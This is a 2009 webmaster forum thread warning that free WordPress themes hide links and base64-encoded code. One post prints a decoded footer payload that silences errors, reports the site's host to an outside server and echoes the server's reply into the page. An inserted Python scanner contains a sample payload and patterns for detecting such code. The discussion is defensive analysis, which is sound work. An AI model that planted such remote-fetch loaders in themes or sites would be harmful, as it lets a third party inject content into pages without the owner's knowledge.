2009-05-03, 03:44 PM | #1
Oh no, I'm sweating like Roger Ebert
Warning Using Free WP Themes
Just wanted to give people a heads up: the last two themes I downloaded have had hidden links inside the code of the index file.
They wouldn't show up on the page but were viewable when you looked at the source.
2009-05-03, 03:55 PM | #2
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
I suspected the same on a client's site that runs multiple WordPress installations and has used multiple free templates. In 5 of the cases, the templates included code in header.php and sidebar.php that allowed specially crafted strings to trigger remote execution. We weren't able to determine whether the modification was made prior to his template being installed or was the result of someone having his admin password for a few of the blogs, as he didn't have the original template file zips.
__________________
SnapReplay.com a different way to share photos - iPhone & Android
2009-05-03, 04:46 PM | #3
Oh no, I'm sweating like Roger Ebert
None of the stuff I've found, so far, has been malicious but I do suggest anyone using free themes look at them closely.
I've never noticed it before, but one of the themes I had issues with was one I'd downloaded about a year ago. I just had never used it.
2009-05-03, 07:53 PM | #4
I can now put whatever you want in this space :)
Join Date: Mar 2009
Location: Merica!
Posts: 543
What were the hidden links to? And were they base64 encoded? I've seen a couple of those, and could have just decoded and removed the base64 encoded crap, but I ditched the themes instead.
2009-05-03, 09:39 PM | #5
Oh no, I'm sweating like Roger Ebert
Quote:
These were links written as HTML but positioned in such a way that they were not visible. One of them redirected to what looks like an old tube site. The others I didn't follow but deleted.
2009-05-03, 10:30 PM | #6
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
Encoding makes it hard for someone to change or remove the link that they are trying to send a little PR to. It is usually wrapped around some other function so that removing it breaks the template somewhat. That's their 'payment' for making the free template.
However, it does make it incredibly easy to hide a malicious payload -- a payload that probably 90% of the internet wouldn't ever notice. If you had something unique enough in the template that you could find sites using it through a Google search, you could exploit a few machines. That is the reason I suspect the templates were not delivered with exploits but were modified through the WordPress admin.
2009-05-05, 12:46 PM | #7
Hey, can you take the wheel for a second, I have to scratch my self in two places at once
Join Date: Aug 2003
Posts: 186
Also, check the footers of any free template. Quite a few have hidden links or Base64 code. I simply do not use them, or I eliminate the code.
2009-05-05, 01:19 PM | #8
You tried your best and you failed miserably. The lesson is 'never try'
Join Date: Dec 2008
Posts: 169
I checked mine and luckily didn't have any crap in there. But yeah, you definitely want to check and make sure there isn't something that might change your blog without your knowing it.
2009-05-07, 12:04 AM | #9
I can now put whatever you want in this space :)
Join Date: Mar 2009
Location: Merica!
Posts: 543
Quote:
__________________
It's just a jump to the left.
2009-05-07, 01:05 AM | #11
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
The problem is that when you decode it like that, you see the rendered code. So, if there was a widget called in the footer, you would have the rendered widget and you couldn't use the WordPress admin to control it.
Secondly, if you do view the rendered text and think, "OK, I'm good with what is being displayed," you would miss any possible exploits that require certain parameters or header values, and you wouldn't be able to see the actual code being executed. I wouldn't use that as a safety net; though, if it didn't include your existing footer widgets, then I would think you should be OK. What I'm starting to see somewhat frequently is that they are wrapping integral page functions into their encoding to prevent you from blindly removing the encoded block.
2009-05-27, 04:42 PM | #12
Me fail English? That's unpossible!
I just downloaded a free WP theme and I like to check the code as well, so I decoded the footer.php and found
Code:
    // Decoded footer payload exactly as posted; comments added to explain what each part does.
    // Silence all PHP errors so a failed fetch leaves no trace on the page.
    error_reporting(0);
    // Build a request to the theme author's server that reports this site's
    // hostname and the current page path (the id= parameter is empty as posted).
    $CodeURL = "http://linkdock.com/content.php?id=&host=" . urlencode($_SERVER["HTTP_HOST"])
             . "&uri=" . urlencode($_SERVER["REQUEST_URI"]);
    // Try each available remote-fetch method in turn and print whatever the
    // server returns straight into the footer.
    if ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file_get_contents")) {
        echo @file_get_contents($CodeURL);
    } elseif ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file")) {
        $content = @file($CodeURL);
        echo @join("", $content);
    } elseif (function_exists("curl_init")) {
        $ch = curl_init($CodeURL);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_exec($ch); // without CURLOPT_RETURNTRANSFER, curl_exec prints the response directly
        curl_close($ch);
    }
2009-05-27, 05:03 PM | #13
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
They are grabbing a link from their rotator script based on the domain that is requesting it. They would be able to change the links displayed in the footer based on your domain name.
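A static theme check of the kind discussed in posts #6, #11 and #13, added here as an example (it is not the TAC plugin's code and not from any post in this thread), written in Python: it unwraps base64_decode("...") literals without executing them, so nothing is rendered, and flags the indicators visible in the decoded footer above (error_reporting(0), a remote fetch keyed on HTTP_HOST) plus CSS-hidden links. The theme files, the payload and the URLs are constructed samples.

```python
import base64
import re

# Constructed sample theme files (not from any real theme); the footer hides a
# remote-fetch payload behind base64, in the style of the decoded snippet above.
PAYLOAD = ('error_reporting(0); $u = "http://example.invalid/c.php?host="'
           '.urlencode($_SERVER["HTTP_HOST"]); echo @file_get_contents($u);')
THEME_FILES = {
    "header.php": '<?php wp_head(); ?>\n<div id="header"><?php bloginfo("name"); ?></div>',
    "footer.php": '<?php eval(base64_decode("'
                  + base64.b64encode(PAYLOAD.encode()).decode()
                  + '")); ?>\n<div style="display:none"><a href="http://spam.invalid">x</a></div>',
}

# Indicators a reviewer should flag; decoded text is only pattern-matched, never executed.
INDICATORS = {
    "eval": re.compile(r"\beval\s*\("),
    "base64": re.compile(r"\bbase64_decode\s*\("),
    "remote_fetch": re.compile(r"\b(file_get_contents|curl_init|fopen)\s*\("),
    "host_leak": re.compile(r"\$_SERVER\s*\[\s*['\"]HTTP_HOST['\"]"),
    "silenced_errors": re.compile(r"\berror_reporting\s*\(\s*0\s*\)"),
    "hidden_link": re.compile(r"(display\s*:\s*none|visibility\s*:\s*hidden)[^<]*<a\s", re.I),
}
B64_LITERAL = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]")

def decode_literals(text, depth=3):
    """Statically unwrap base64_decode("...") literals, up to `depth` layers of nesting.
    Returns [raw_source, decoded_layer_1, ...]; invalid base64 is skipped."""
    layers = [text]
    for _ in range(depth):
        found = []
        for m in B64_LITERAL.finditer(layers[-1]):
            try:
                raw = base64.b64decode(re.sub(r"\s", "", m.group(1)), validate=True)
                found.append(raw.decode("utf-8", "replace"))
            except (ValueError, UnicodeDecodeError):
                continue
        if not found:
            break
        layers.append("\n".join(found))
    return layers

def scan_theme(files):
    """Return {filename: sorted indicator names} for every file with at least one hit."""
    report = {}
    for name, src in files.items():
        hits = {key for layer in decode_literals(src) for key, rx in INDICATORS.items() if rx.search(layer)}
        if hits:
            report[name] = sorted(hits)
    return report

if __name__ == "__main__":
    for name, hits in scan_theme(THEME_FILES).items():
        print(f"{name}: {', '.join(hits)}")
```

Point `scan_theme` at the files read from a real theme directory; a hit on `remote_fetch` or `host_leak` inside a decoded layer is the pattern the decoded footer above shows.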
2009-06-13, 08:01 PM | #15
Someone Turn Off The Damn Heat!
Download the TAC plugin. I don't have a link, but Google it; it works great to scan your themes.
__________________
Get ElevatedX W/Hosting 99MO!
2009-06-16, 02:07 AM | #16
Internet! Is that thing still around?
Join Date: Jun 2009
Posts: 2
Is it possible to have the names of those WP themes? Thanks for bringing this up.
2009-06-16, 11:13 AM | #17
Are you sure this is the Sci-Fi Convention? It's full of nerds!
Join Date: Mar 2009
Posts: 266
mmm, thanks for letting us know!
2009-06-16, 01:48 PM | #18
Oh no, I'm sweating like Roger Ebert
Seriously, there are too many to list. Most of the ones created within the last year seem to have encoded footers at least.
2009-06-16, 06:13 PM | #19
Someone Turn Off The Damn Heat!
Quote:
As was previously posted, there are too many to list, and who knows what you are using. Some of them are not malicious; it's just them maybe taking some probably crap traffic that didn't already buy from you via posts in the bottom footer. For those, if the theme is good SEO-wise and looks good, go ahead and use it. I mean, it's free, and the person who made it might as well make a bit of cash for their hard work. But others do have evil code in them, so download the TAC plugin that I listed earlier and test the theme.
2009-06-17, 05:26 AM | #20
Internet! Is that thing still around?
Join Date: Jun 2009
Posts: 3
Thanks. Before reading this, I just thought editing the index file and deleting the links would help, but everything seems to be a lot more complicated. Thanks again.
__________________
Create your own dating site with 6 million profiles for free!